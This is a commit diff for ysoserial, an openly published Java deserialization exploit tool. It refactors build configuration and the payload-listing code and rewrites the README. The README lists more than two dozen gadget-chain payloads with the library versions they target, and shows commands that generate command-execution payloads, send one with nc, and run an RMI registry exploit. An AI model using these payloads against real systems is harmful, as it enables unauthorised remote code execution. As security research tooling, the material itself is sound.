fixes, refactoring

.editorconfig

@@ -0,0 +1,13 @@
+root = true
+
+[*]
+end_of_line = lf
+charset = utf-8
+trim_trailing_whitespace = true
+insert_final_newline = true
+indent_style = space
+indent_size = 4
+max_line_length = 120
+
+[*.{yml,yaml}]
+indent_size = 2

.gitignore

@@ -1,5 +1,17 @@
-/target
+# java
+*.class
+
+# mvn
+target/
+
+# eclipse
 .classpath
 .project
 .settings/
+
+# idea
+.idea/
+*.iml
+
+# tests
 pwntest

.travis.yml

@@ -1,6 +1,11 @@
+dist: trusty
 language: java
+# Travis CI provides OpenJDK 6, OpenJDK 7, Oracle JDK 7, and Oracle JDK 8.
+# Sun JDK 6 is not provided, because it is EOL as of November 2012.
+# OpenJDK 8 is available on our Trusty images, specify dist: trusty to make use of it.
 jdk:
   - oraclejdk8    
-  - oraclejdk7
+  #- oraclejdk7 #https://github.com/travis-ci/travis-ci/issues/7884
+  - openjdk8
   - openjdk7
-  - openjdk6
+  #- openjdk6 #https://github.com/travis-ci/travis-ci/issues/8199

README.md

@@ -1,109 +1,127 @@
-
-# ysoserial 
-
-[![Join the chat at https://gitter.im/frohoff/ysoserial](https://badges.gitter.im/frohoff/ysoserial.svg)](https://gitter.im/frohoff/ysoserial?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) [![Download Latest Snapshot](https://img.shields.io/badge/download-master--SNAPSHOT-green.svg)](https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar)
-
-A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
-
-![](https://github.com/frohoff/ysoserial/blob/master/ysoserial.png)
-
-## Description
-
-Released as part of AppSecCali 2015 Talk ["Marshalling Pickles: how deserializing objects will ruin your day"](http://frohoff.github.io/appseccali-marshalling-pickles/) with gadget chains for Apache Commons Collections (3.x and 4.x), Spring Beans/Core (4.x), and Groovy (2.3.x). 
-Later updated to include additional gadget chains for [JRE <= 1.7u21](https://gist.github.com/frohoff/24af7913611f8406eaf3) and [Apache Commons Beanutils](https://gist.github.com/frohoff/9eb8811761ff989b3ac0).
-
-__ysoserial__ is a collection of utilities and property-oriented programming "gadget chains" discovered in common java 
-libraries that can, under the right conditions, exploit Java applications performing __unsafe deserialization__ of objects. 
-The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then
-serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes
-this data, the chain will automatically be invoked and cause the command to be executed on the application host.
-
-It should be noted that the vulnerability lies in the application performing unsafe deserialization and NOT in having
-gadgets on the classpath.
-
-## Disclaimer
-
-This software has been created purely for the purposes of academic research and
-for the development of effective defensive techniques, and is not intended to be
-used to attack systems except where explicitly authorized. Project maintainers 
-are not responsible or liable for misuse of the software. Use responsibly.
-
-## Usage
-
-```shell
-$  java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar
-Y SO SERIAL?
-Usage: java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]'
-        Available payload types:
-                BeanShell1 [org.beanshell:bsh:2.0b5]
-                C3P0 [com.mchange:c3p0:0.9.5.2, com.mchange:mchange-commons-java:0.2.11]
-                Clojure [org.clojure:clojure:1.8.0]
-                CommonsBeanutils1 [commons-beanutils:commons-beanutils:1.9.2, commons-collections:commons-collections:3.1, commons-logging:commons-logging:1.2]
-                CommonsCollections1 [commons-collections:commons-collections:3.1]
-                CommonsCollections2 [org.apache.commons:commons-collections4:4.0]
-                CommonsCollections3 [commons-collections:commons-collections:3.1]
-                CommonsCollections4 [org.apache.commons:commons-collections4:4.0]
-                CommonsCollections5 [commons-collections:commons-collections:3.1]
-                CommonsCollections6 [commons-collections:commons-collections:3.1]
-                FileUpload1 [commons-fileupload:commons-fileupload:1.3.1, commons-io:commons-io:2.4]
-                Groovy1 [org.codehaus.groovy:groovy:2.3.9]
-                Hibernate1 []
-                Hibernate2 []
-                JBossInterceptors1 [javassist:javassist:3.12.1.GA, org.jboss.interceptor:jboss-interceptor-core:2.0.0.Final, javax.enterprise:cdi-api:1.0-SP1, javax.interceptor:javax.interceptor-api:3.1, org.jboss.interceptor:jboss-interceptor-spi:2.0.0.Final, org.slf4j:slf4j-api:1.7.21]
-                JRMPClient []
-                JRMPListener []
-                JSON1 [net.sf.json-lib:json-lib:jar:jdk15:2.4, org.springframework:spring-aop:4.1.4.RELEASE, aopalliance:aopalliance:1.0, commons-logging:commons-logging:1.2, commons-lang:commons-lang:2.6, net.sf.ezmorph:ezmorph:1.0.6, commons-beanutils:commons-beanutils:1.9.2, org.springframework:spring-core:4.1.4.RELEASE, commons-collections:commons-collections:3.1]
-                JavassistWeld1 [javassist:javassist:3.12.1.GA, org.jboss.weld:weld-core:1.1.33.Final, javax.enterprise:cdi-api:1.0-SP1, javax.interceptor:javax.interceptor-api:3.1, org.jboss.interceptor:jboss-interceptor-spi:2.0.0.Final, org.slf4j:slf4j-api:1.7.21]
-                Jdk7u21 []
-                Jython1 [org.python:jython-standalone:2.5.2]
-                MozillaRhino1 [rhino:js:1.7R2]
-                Myfaces1 []
-                Myfaces2 []
-                ROME [rome:rome:1.0]
-                Spring1 [org.springframework:spring-core:4.1.4.RELEASE, org.springframework:spring-beans:4.1.4.RELEASE]
-                Spring2 [org.springframework:spring-core:4.1.4.RELEASE, org.springframework:spring-aop:4.1.4.RELEASE, aopalliance:aopalliance:1.0, commons-logging:commons-logging:1.2]
-                URLDNS []
-                Wicket1 [wicket-util:wicket-util:6.23]
-```
-
-## Examples
-
-```shell
-$ java -jar ysoserial-0.0.4-all.jar CommonsCollections1 calc.exe | xxd
-0000000: aced 0005 7372 0032 7375 6e2e 7265 666c  ....sr.2sun.refl
-0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41  ect.annotation.A
-0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174  nnotationInvocat
-...
-0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76  vr..java.lang.Ov
-0000560: 6572 7269 6465 0000 0000 0000 0000 0000  erride..........
-0000570: 0078 7071 007e 003a                      .xpq.~.:
-
-$ java -jar ysoserial-0.0.4-all.jar Groovy1 calc.exe > groovypayload.bin
-$ nc 10.10.10.10 < groovypayload.bin
-
-$ java -cp ysoserial-0.0.4-all.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe
-```
-
-## Installation
-
-1. Download the latest jar from [JitPack](https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar) [![Download Latest Snapshot](https://img.shields.io/badge/download-master--SNAPSHOT-green.svg)](https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar) .
-
-Note that GitHub-hosted releases were removed in compliance with the [GitHub Community Guidelines](https://help.github.com/articles/github-community-guidelines/#what-is-not-allowed)
-
-## Building
-
-Requires Java 1.7+ and Maven 3.x+
-
-```mvn clean package -DskipTests```
-
-## Code Status
-
-[![Build Status](https://travis-ci.org/frohoff/ysoserial.svg?branch=master)](https://travis-ci.org/frohoff/ysoserial)
-
-## Contributing
-
-1. Fork it
-2. Create your feature branch (`git checkout -b my-new-feature`)
-3. Commit your changes (`git commit -am 'Add some feature'`)
-4. Push to the branch (`git push origin my-new-feature`)
-5. Create new Pull Request
+
+# ysoserial
+
+[![Join the chat at https://gitter.im/frohoff/ysoserial](
+    https://badges.gitter.im/frohoff/ysoserial.svg)](
+    https://gitter.im/frohoff/ysoserial?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)
+[![Download Latest Snapshot](https://img.shields.io/badge/download-master--SNAPSHOT-green.svg)](
+    https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar)
+
+A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
+
+![logo](ysoserial.png)
+
+## Description
+
+Originally released as part of AppSecCali 2015 Talk
+["Marshalling Pickles: how deserializing objects will ruin your day"](
+        http://frohoff.github.io/appseccali-marshalling-pickles/)
+with gadget chains for Apache Commons Collections (3.x and 4.x), Spring Beans/Core (4.x), and Groovy (2.3.x).
+Later updated to include additional gadget chains for
+[JRE <= 1.7u21](https://gist.github.com/frohoff/24af7913611f8406eaf3) and several other libraries.
+
+__ysoserial__ is a collection of utilities and property-oriented programming "gadget chains" discovered in common java
+libraries that can, under the right conditions, exploit Java applications performing __unsafe deserialization__ of
+objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then
+serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes
+this data, the chain will automatically be invoked and cause the command to be executed on the application host.
+
+It should be noted that the vulnerability lies in the application performing unsafe deserialization and NOT in having
+gadgets on the classpath.
+
+## Disclaimer
+
+This software has been created purely for the purposes of academic research and
+for the development of effective defensive techniques, and is not intended to be
+used to attack systems except where explicitly authorized. Project maintainers
+are not responsible or liable for misuse of the software. Use responsibly.
+
+## Usage
+
+```shell
+$  java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar
+Y SO SERIAL?
+Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
+  Available payload types:
+     Payload             Authors                     Dependencies
+     -------             -------                     ------------
+     BeanShell1          @pwntester, @cschneider4711 bsh:2.0b5
+     C3P0                @mbechler                   c3p0:0.9.5.2, mchange-commons-java:0.2.11
+     Clojure             @JackOfMostTrades           clojure:1.8.0
+     CommonsBeanutils1   @frohoff                    commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
+     CommonsCollections1 @frohoff                    commons-collections:3.1
+     CommonsCollections2 @frohoff                    commons-collections4:4.0
+     CommonsCollections3 @frohoff                    commons-collections:3.1
+     CommonsCollections4 @frohoff                    commons-collections4:4.0
+     CommonsCollections5 @frohoff                    commons-collections:3.1
+     CommonsCollections6 @matthias_kaiser            commons-collections:3.1
+     FileUpload1         @mbechler                   commons-fileupload:1.3.1, commons-io:2.4
+     Groovy1             @frohoff                    groovy:2.3.9
+     Hibernate1          @mbechler
+     Hibernate2          @mbechler
+     JBossInterceptors1  @matthias_kaiser            javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
+     JRMPClient          @mbechler
+     JRMPListener        @mbechler
+     JSON1               @mbechler                   json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
+     JavassistWeld1      @matthias_kaiser            javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
+     Jdk7u21             @frohoff
+     Jython1             @pwntester, @cschneider4711 jython-standalone:2.5.2
+     MozillaRhino1       @mbechler                   js:1.7R2
+     Myfaces1            @mbechler
+     Myfaces2            @mbechler
+     ROME                @mbechler                   rome:1.0
+     Spring1             @frohoff                    spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
+     Spring2             @mbechler                   spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
+     URLDNS              @gebl
+     Wicket1             @jacob-baines               wicket-util:6.23
+```
+
+## Examples
+
+```shell
+$ java -jar ysoserial-0.0.4-all.jar CommonsCollections1 calc.exe | xxd
+0000000: aced 0005 7372 0032 7375 6e2e 7265 666c  ....sr.2sun.refl
+0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41  ect.annotation.A
+0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174  nnotationInvocat
+...
+0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76  vr..java.lang.Ov
+0000560: 6572 7269 6465 0000 0000 0000 0000 0000  erride..........
+0000570: 0078 7071 007e 003a                      .xpq.~.:
+
+$ java -jar ysoserial-0.0.4-all.jar Groovy1 calc.exe > groovypayload.bin
+$ nc 10.10.10.10 1099 < groovypayload.bin
+
+$ java -cp ysoserial-0.0.4-all.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe
+```
+
+## Installation
+
+1. Download the latest jar from
+[JitPack](https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar)
+[![Download Latest Snapshot](https://img.shields.io/badge/download-master--SNAPSHOT-green.svg)](
+    https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar)
+
+Note that GitHub-hosted releases were removed in compliance with the
+[GitHub Community Guidelines](
+    https://help.github.com/articles/github-community-guidelines/#what-is-not-allowed)
+
+## Building
+
+Requires Java 1.7+ and Maven 3.x+
+
+```mvn clean package -DskipTests```
+
+## Code Status
+
+[![Build Status](https://travis-ci.org/frohoff/ysoserial.svg?branch=master)](https://travis-ci.org/frohoff/ysoserial)
+
+## Contributing
+
+1. Fork it
+2. Create your feature branch (`git checkout -b my-new-feature`)
+3. Commit your changes (`git commit -am 'Add some feature'`)
+4. Push to the branch (`git push origin my-new-feature`)
+5. Create new Pull Request
+
+## Additional Reading
+* https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet

pom.xml

@@ -8,7 +8,7 @@
 	<packaging>jar</packaging>
 
 	<name>ysoserial</name>
-	<url>http://maven.apache.org</url>
+	<url>https://github.com/frohoff/ysoserial/</url>
 
 	<properties>
 		<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
@@ -52,6 +52,7 @@
 			<plugin>
 		        <groupId>org.apache.maven.plugins</groupId>
 		        <artifactId>maven-surefire-plugin</artifactId>
+                <version>2.20</version>
 		        <configuration>
 			        <systemPropertyVariables>
 			        	<java.rmi.server.useCodebaseOnly>false</java.rmi.server.useCodebaseOnly>
@@ -60,7 +61,7 @@
 		    </plugin>
 		</plugins>
 	</build>
-	
+
 	<repositories>
 		<repository>
 			<id>jenkins</id>
@@ -360,6 +361,6 @@
 				</dependency>
 			</dependencies>
 		</profile>
-		
+
 	</profiles>
 </project>

src/main/java/ysoserial/GeneratePayload.java

@@ -1,19 +1,15 @@
 package ysoserial;
 
 import java.io.PrintStream;
-import java.util.ArrayList;
-import java.util.Arrays;
-import java.util.Collections;
-import java.util.Comparator;
-import java.util.List;
+import java.util.*;
 
 import ysoserial.payloads.ObjectPayload;
 import ysoserial.payloads.ObjectPayload.Utils;
+import ysoserial.payloads.annotation.Authors;
 import ysoserial.payloads.annotation.Dependencies;
 
 @SuppressWarnings("rawtypes")
 public class GeneratePayload {
-
 	private static final int INTERNAL_ERROR_CODE = 70;
 	private static final int USAGE_CODE = 64;
 
@@ -49,18 +45,28 @@ public static void main(final String[] args) {
 
 	private static void printUsage() {
 		System.err.println("Y SO SERIAL?");
-		System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]'");
-		System.err.println("\tAvailable payload types:");
+		System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'");
+		System.err.println("  Available payload types:");
+
 		final List<Class<? extends ObjectPayload>> payloadClasses =
 			new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
-		Collections.sort(payloadClasses, new ToStringComparator()); // alphabetize
-		for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
-			System.err.println("\t\t" + payloadClass.getSimpleName() + " " + Arrays.asList(Dependencies.Utils.getDependencies(payloadClass)));
-		}
-	}
+		Collections.sort(payloadClasses, new Strings.ToStringComparator()); // alphabetize
 
-	public static class ToStringComparator implements Comparator<Object> {
-		public int compare(Object o1, Object o2) { return o1.toString().compareTo(o2.toString()); }
-	}
+        final List<String[]> rows = new LinkedList<String[]>();
+        rows.add(new String[] {"Payload", "Authors", "Dependencies"});
+        rows.add(new String[] {"-------", "-------", "------------"});
+        for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
+             rows.add(new String[] {
+                payloadClass.getSimpleName(),
+                Strings.join(Arrays.asList(Authors.Utils.getAuthors(payloadClass)), ", ", "@", ""),
+                Strings.join(Arrays.asList(Dependencies.Utils.getDependenciesSimple(payloadClass)),", ", "", "")
+            });
+        }
+
+        final List<String> lines = Strings.formatTable(rows);
 
+        for (String line : lines) {
+            System.err.println("     " + line);
+        }
+    }
 }